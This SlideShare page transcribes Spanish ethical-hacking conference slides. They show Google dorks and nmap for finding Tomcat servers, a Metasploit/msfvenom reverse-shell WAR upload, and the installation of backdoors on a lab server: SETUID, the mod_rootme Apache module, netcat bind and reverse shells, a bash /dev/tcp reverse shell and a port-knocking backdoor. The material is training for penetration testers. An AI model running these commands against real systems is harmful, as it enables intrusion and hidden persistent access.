SlideShare una empresa de Scribd logo
1 de 25
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
AGENDA 1. ¿Quién soy?
2. Buscando vulnerabilidades backdoors
3. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Información sobre el curso
6. Conclusiones
#whoami
• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,
C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
• Instructor Oficial de MILE2
• Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
• Psicólogo que aun no comienza sus estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
• Correo electrónico:
• omarc320@gmail.com
• opalomino@kunak.com.pe
• Cuenta de Facebook:
• www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
¿Qué es un Backdoor (puerta trasera)?
• Los backdoors son programas utilizados
por los hackers para lograr acceso a
sistemas operativos de manera rápida y
sencilla.
• Existen diferentes tipos de backdoors:
• Backdoors en Aplicaciones Web
• Backdoors a través de SETUID
• Backdoors en Módulos de Servicios
• Backdoors del tipo Knocking
Arquitectura de los Ejemplos
TARGET
- Servidor TOMCAT vulnerable
- Aquí se instalaran los backdoors
- Sistema Operativo Linux
ATACANTE
- Computador desde el cual se
realizarán los ataques
- Sistema Operativo KALI LINUX 2
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Dirección IP: 192.168.4.131
Dirección IP: 192.168.4.130
Dirección IP: 192.168.4.132
Identificar Servicios TOMCAT
• Buscamos TOMCAT en la RED LAN a
través de NMAP
Nmap –sV –p 8080 –sS TARGET
auxiliary/scanner/portscan/syn
Buscamos TOMCAT/AXIS2 en INTERNET:
Google Dork:
intitle:"Tomcat Server Administration“
intitle:"Axis2 Happiness Page" +ext:jsp
Ahora si …. Vamos con los ejemplos
Identificar Vulnerabilidades en TOMCAT
• Vamos a utilizar METASPLOIT para identificar
vulnerabilidades:
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
Finalmente realizar la carga de un .WAR malicioso para
obtener acceso al sistema operativo.
msfvenom -p java/meterpreter/reverse_tcp
LHOST=192.168.4.131 -f war > meterpreter.war
En el cliente:
Msf> use exploit/multi/handler
Msf> set payload java/meterpreter/reverse_tcp
Backdoor con SETUID
• De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues este
mecanismo de backdoor está asociado a SETUID.
¿Entonces en que consiste el SETUID?
El SETUID es un bit que permite a las aplicaciones
ejecutarse con los permisos de su propietario. El
concepto puede sonar muy abstracto pero si ponemos
un ejemplo es más facil entender, vamos a crear un
archivo llamado TEST.C y lo compilamos.
Backdoor con SETUID
Backdoor en Apache Server
• Cargamos un módulo en APACHE de tal
manera que no se realicen cambios a nivel de
código en los aplicativos PHP.
• ¿Cuántos administradores de Sistemas
verifican los módulos cargados en Apache?
• Toca compilar un módulo de APACHE llamado
ModROOTme.
https://github.com/jingchunzhang/backdoor_rootkit/
tree/master/mod_rootme-0.4
Backdoor en Apache Server
• Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor: BindShell
• Las primeras herramientas utilizados por
Hackers fue la navaja suiza “NETCAT”.
• Una BindShell es un programa
corriendo una SHELL dentro de un
proceso de red.
• Una BindShell puede estar escrita en
cualquier lenguaje de programación.
http://netcat.sourceforge.net/download.php
Backdoor: Bind Shell
• Comandos en el sistema operativo:
root>./configure --enable-
DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:>nc64.exe 192.168.75.133 8443
Backdoor: Reverse Shell
• Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
• Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.
Backdoor: Reverse Shell
• Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
Backdoor: Reverse Shell
• Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
./netcat -e /bin/sh 192.168.1.34 8080
Backdoor: KnockOut
• Knock viene del ingles tocar la
puerta.
• Este es un backdoor del tipo
“Reverse Shell” que pasa
desapercibido.
• Sólo puede ser accedido por aquel
que conozca la combinación de la
“puerta” correcta.
Backdoor: KnockOut
• En el servidor:
• Root> $make servidor
• Root> ./knock-outd knock-out.conf eth5
• En el cliente (atacante):
• Root> $make cliente
• Root> ./knock-outc 192.168.4.130 knock-out.conf
• Root> ./netcat -lv -p 64876
AGENDA 1. ¿Quién soy?
2. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Información sobre el curso
5. Conclusiones
Curso de Ethical Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniería (UNI) – Lima – Perú
Duración: 24 horas – Curso Básico
24 horas – Curso Avanzado
Certificado: A nombre de la Universidad
Nacional de Ingeniería (UNI)
Próximo Inicio: Inicios Recurrentes
Curso de Seguridad de Información
http://www.kunak.com.pe
Lugar: Miraflores – Lima – Perú
Duración: 60 horas
Certificado: A nombre Kunak
Consulting SAC
Próximo Inicio: Por definir
Conferencia Innovación en Técnicas de Ethical Hacking

Más contenido relacionado

La actualidad más candente

Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
RootedCON
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
n3xasec
 
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
RootedCON
 
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
RootedCON
 

La actualidad más candente (20)

Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
 
Seguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticasSeguridad en WordPress, fundamentos y mejores prácticas
Seguridad en WordPress, fundamentos y mejores prácticas
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
 
Reventando WordPress
Reventando WordPressReventando WordPress
Reventando WordPress
 
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
José Luis Verdeguer - FreePBX for fun & profit [Rooted CON 2013]
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducido
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
 
Instalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en awsInstalar siberian cms (hestia cp) en aws
Instalar siberian cms (hestia cp) en aws
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
 
Entorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con VagrantEntorno de desarrollo rápido con Vagrant
Entorno de desarrollo rápido con Vagrant
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
David Meléndez Cano - Trash Robotic Router Platform (TRRP) [Rooted CON 2013]
 
Seguridad en WordPress
Seguridad en WordPressSeguridad en WordPress
Seguridad en WordPress
 
Recopilación de Penetration Test Backtrack
Recopilación  de Penetration Test BacktrackRecopilación  de Penetration Test Backtrack
Recopilación de Penetration Test Backtrack
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
Metasploit
MetasploitMetasploit
Metasploit
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
Seguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detalladoSeguridad en Asterisk: Un acercamiento detallado
Seguridad en Asterisk: Un acercamiento detallado
 
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
Hugo Teso - Inguma 0.5 Red Wagon [Rooted CON 2012]
 

Similar a Conferencia Innovación en Técnicas de Ethical Hacking

Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
wcuestas
 
Multi relay
Multi relayMulti relay
Multi relay
jselvi
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
RootedCON
 
Policyd: Instalacion y configuracion
Policyd: Instalacion y configuracionPolicyd: Instalacion y configuracion
Policyd: Instalacion y configuracion
criscega
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimes
Victor Jaimes
 

Similar a Conferencia Innovación en Técnicas de Ethical Hacking (20)

Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Instalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estableInstalacion y configuracion de squid 2.6 estable
Instalacion y configuracion de squid 2.6 estable
 
Docker y PostgreSQL
Docker y PostgreSQLDocker y PostgreSQL
Docker y PostgreSQL
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
PDIDTI-S7.pptx
PDIDTI-S7.pptxPDIDTI-S7.pptx
PDIDTI-S7.pptx
 
Clusters Beowulf
Clusters BeowulfClusters Beowulf
Clusters Beowulf
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 
Backtrack 5 manual traducido
Backtrack 5 manual traducido Backtrack 5 manual traducido
Backtrack 5 manual traducido
 
Actividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/LinuxActividad No. 5.5: Aseguramiento de servidores GNU/Linux
Actividad No. 5.5: Aseguramiento de servidores GNU/Linux
 
Multi relay
Multi relayMulti relay
Multi relay
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Detectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSDetectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOS
 
Bulma 441
Bulma 441Bulma 441
Bulma 441
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducido
 
Gestión Remota de Equipos con Python
Gestión Remota de Equipos con PythonGestión Remota de Equipos con Python
Gestión Remota de Equipos con Python
 
Policyd: Instalacion y configuracion
Policyd: Instalacion y configuracionPolicyd: Instalacion y configuracion
Policyd: Instalacion y configuracion
 
Actividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimesActividad4 manual usuarrio _victor jaimes
Actividad4 manual usuarrio _victor jaimes
 
Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con Snort
 

Más de Hacking Bolivia

Más de Hacking Bolivia (20)

csi pdf2022.pdf
csi pdf2022.pdfcsi pdf2022.pdf
csi pdf2022.pdf
 
ciifBO.pdf
ciifBO.pdfciifBO.pdf
ciifBO.pdf
 
Cistrip.pdf
Cistrip.pdfCistrip.pdf
Cistrip.pdf
 
ciifBO.pdf
ciifBO.pdfciifBO.pdf
ciifBO.pdf
 
hackinbo.pdf
hackinbo.pdfhackinbo.pdf
hackinbo.pdf
 
csi bo 2022.pdf
csi bo 2022.pdfcsi bo 2022.pdf
csi bo 2022.pdf
 
Bajo Ataque 2.pptx
Bajo Ataque 2.pptxBajo Ataque 2.pptx
Bajo Ataque 2.pptx
 
Cveif2020 1
Cveif2020 1Cveif2020 1
Cveif2020 1
 
Calificaciones EEH2020
Calificaciones EEH2020Calificaciones EEH2020
Calificaciones EEH2020
 
CSI 2019 NOTAS
CSI 2019 NOTASCSI 2019 NOTAS
CSI 2019 NOTAS
 
Pre Shenlong
Pre ShenlongPre Shenlong
Pre Shenlong
 
Calificaciones del ESRI 2019
Calificaciones del ESRI 2019Calificaciones del ESRI 2019
Calificaciones del ESRI 2019
 
Csi 2017 cbba
Csi 2017 cbbaCsi 2017 cbba
Csi 2017 cbba
 
CSI 2017 LP
CSI 2017 LPCSI 2017 LP
CSI 2017 LP
 
Lista de participantes VII CIIFHE
Lista de participantes VII CIIFHELista de participantes VII CIIFHE
Lista de participantes VII CIIFHE
 
Csi 2017 scz
Csi 2017 sczCsi 2017 scz
Csi 2017 scz
 
Riesgos del Internet de las Cosas
Riesgos del Internet de las CosasRiesgos del Internet de las Cosas
Riesgos del Internet de las Cosas
 
Analisis de ataques desarrollador por IOT
Analisis de ataques desarrollador por IOTAnalisis de ataques desarrollador por IOT
Analisis de ataques desarrollador por IOT
 
Pusheen pre adopcion
Pusheen pre adopcionPusheen pre adopcion
Pusheen pre adopcion
 
Acredita tu conocimiento
Acredita tu conocimientoAcredita tu conocimiento
Acredita tu conocimiento
 

Último

Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
patriciaines1993
 
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
jlorentemartos
 
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Fernando Solis
 

Último (20)

BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
 
La Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración AmbientalLa Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración Ambiental
 
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLAACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
 
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
 
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docxPLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
 
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
TEMA 14.DERIVACIONES ECONÓMICAS, SOCIALES Y POLÍTICAS DEL PROCESO DE INTEGRAC...
 
Lecciones 06 Esc. Sabática. Los dos testigos
Lecciones 06 Esc. Sabática. Los dos testigosLecciones 06 Esc. Sabática. Los dos testigos
Lecciones 06 Esc. Sabática. Los dos testigos
 
activ4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdfactiv4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdf
 
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptx
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
Desarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por ValoresDesarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por Valores
 
prostitución en España: una mirada integral!
prostitución en España: una mirada integral!prostitución en España: una mirada integral!
prostitución en España: una mirada integral!
 
Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtuales
 
Tema 19. Inmunología y el sistema inmunitario 2024
Tema 19. Inmunología y el sistema inmunitario 2024Tema 19. Inmunología y el sistema inmunitario 2024
Tema 19. Inmunología y el sistema inmunitario 2024
 
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOTIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
 
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPCTRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
 
Plan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdf
Plan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdfPlan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdf
Plan-de-la-Patria-2019-2025- TERCER PLAN SOCIALISTA DE LA NACIÓN.pdf
 
Interpretación de cortes geológicos 2024
Interpretación de cortes geológicos 2024Interpretación de cortes geológicos 2024
Interpretación de cortes geológicos 2024
 
Usos y desusos de la inteligencia artificial en revistas científicas
Usos y desusos de la inteligencia artificial en revistas científicasUsos y desusos de la inteligencia artificial en revistas científicas
Usos y desusos de la inteligencia artificial en revistas científicas
 

Conferencia Innovación en Técnicas de Ethical Hacking

  • 1.
  • 2. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  • 3. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  • 4. #whoami • Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH, C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002 • Instructor Oficial de MILE2 • Consultor de Kunak Consulting SAC http://www.kunak.com.pe • Psicólogo que aun no comienza sus estudios…. • Escritor en mis tiempos libres: http://www.el-palomo.com • Correo electrónico: • omarc320@gmail.com • opalomino@kunak.com.pe • Cuenta de Facebook: • www.facebook.com/El.Palomo.Seguridad.Informacion
  • 5. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  • 6. ¿Qué es un Backdoor (puerta trasera)? • Los backdoors son programas utilizados por los hackers para lograr acceso a sistemas operativos de manera rápida y sencilla. • Existen diferentes tipos de backdoors: • Backdoors en Aplicaciones Web • Backdoors a través de SETUID • Backdoors en Módulos de Servicios • Backdoors del tipo Knocking
  • 7. Arquitectura de los Ejemplos TARGET - Servidor TOMCAT vulnerable - Aquí se instalaran los backdoors - Sistema Operativo Linux ATACANTE - Computador desde el cual se realizarán los ataques - Sistema Operativo KALI LINUX 2 ATACANTE 2 - Computador desde el cual se explotaran los backdoors - Sistema Operativo Linux Dirección IP: 192.168.4.131 Dirección IP: 192.168.4.130 Dirección IP: 192.168.4.132
  • 8. Identificar Servicios TOMCAT • Buscamos TOMCAT en la RED LAN a través de NMAP Nmap –sV –p 8080 –sS TARGET auxiliary/scanner/portscan/syn Buscamos TOMCAT/AXIS2 en INTERNET: Google Dork: intitle:"Tomcat Server Administration“ intitle:"Axis2 Happiness Page" +ext:jsp
  • 9. Ahora si …. Vamos con los ejemplos
  • 10. Identificar Vulnerabilidades en TOMCAT • Vamos a utilizar METASPLOIT para identificar vulnerabilidades: Root> msfconsole Root> search tomcat Root> use auxiliary/scanner/http/tomcat_mgr_login Root> show options Root> set RHOSTS 192.168.4.130 Finalmente realizar la carga de un .WAR malicioso para obtener acceso al sistema operativo. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.4.131 -f war > meterpreter.war En el cliente: Msf> use exploit/multi/handler Msf> set payload java/meterpreter/reverse_tcp
  • 11. Backdoor con SETUID • De pronto algunos nunca escucharon de los permisos GETUID, SETUID y STICKY. Pues este mecanismo de backdoor está asociado a SETUID. ¿Entonces en que consiste el SETUID? El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario. El concepto puede sonar muy abstracto pero si ponemos un ejemplo es más facil entender, vamos a crear un archivo llamado TEST.C y lo compilamos.
  • 13. Backdoor en Apache Server • Cargamos un módulo en APACHE de tal manera que no se realicen cambios a nivel de código en los aplicativos PHP. • ¿Cuántos administradores de Sistemas verifican los módulos cargados en Apache? • Toca compilar un módulo de APACHE llamado ModROOTme. https://github.com/jingchunzhang/backdoor_rootkit/ tree/master/mod_rootme-0.4
  • 14. Backdoor en Apache Server • Comandos en el Sistema Operativo root>cd mod_rootme-0.4/ root>Make Linux root> cp mod_rootme2.so /etc/httpd/modules root> /etc/init.d/httpd reload En el cliente: Root> nc 192.168.4.130 80 GET root
  • 15. Backdoor: BindShell • Las primeras herramientas utilizados por Hackers fue la navaja suiza “NETCAT”. • Una BindShell es un programa corriendo una SHELL dentro de un proceso de red. • Una BindShell puede estar escrita en cualquier lenguaje de programación. http://netcat.sourceforge.net/download.php
  • 16. Backdoor: Bind Shell • Comandos en el sistema operativo: root>./configure --enable- DGAPING_SECURITY_HOLE root>Make root> cd src/ root> ./netcat -l -p 8443 -e /bin/sh root> bg En el CLIENTE: C:>nc64.exe 192.168.75.133 8443
  • 17. Backdoor: Reverse Shell • Tiene el mismo concepto que una Bind Shell pero realizada de manera reversa. • Ahora es el servidor quien se conecta a nuestro cliente. Esta pensado para poder realizar bypass de Firewalls.
  • 18. Backdoor: Reverse Shell • Reverse Shell con BASH En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
  • 19. Backdoor: Reverse Shell • Reverse Shell con NETCAT En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: ./netcat -e /bin/sh 192.168.1.34 8080
  • 20. Backdoor: KnockOut • Knock viene del ingles tocar la puerta. • Este es un backdoor del tipo “Reverse Shell” que pasa desapercibido. • Sólo puede ser accedido por aquel que conozca la combinación de la “puerta” correcta.
  • 21. Backdoor: KnockOut • En el servidor: • Root> $make servidor • Root> ./knock-outd knock-out.conf eth5 • En el cliente (atacante): • Root> $make cliente • Root> ./knock-outc 192.168.4.130 knock-out.conf • Root> ./netcat -lv -p 64876
  • 22. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  • 23. Curso de Ethical Hacking https://www.facebook.com/sistemasuni/ Lugar: Universidad Nacional de Ingeniería (UNI) – Lima – Perú Duración: 24 horas – Curso Básico 24 horas – Curso Avanzado Certificado: A nombre de la Universidad Nacional de Ingeniería (UNI) Próximo Inicio: Inicios Recurrentes
  • 24. Curso de Seguridad de Información http://www.kunak.com.pe Lugar: Miraflores – Lima – Perú Duración: 60 horas Certificado: A nombre Kunak Consulting SAC Próximo Inicio: Por definir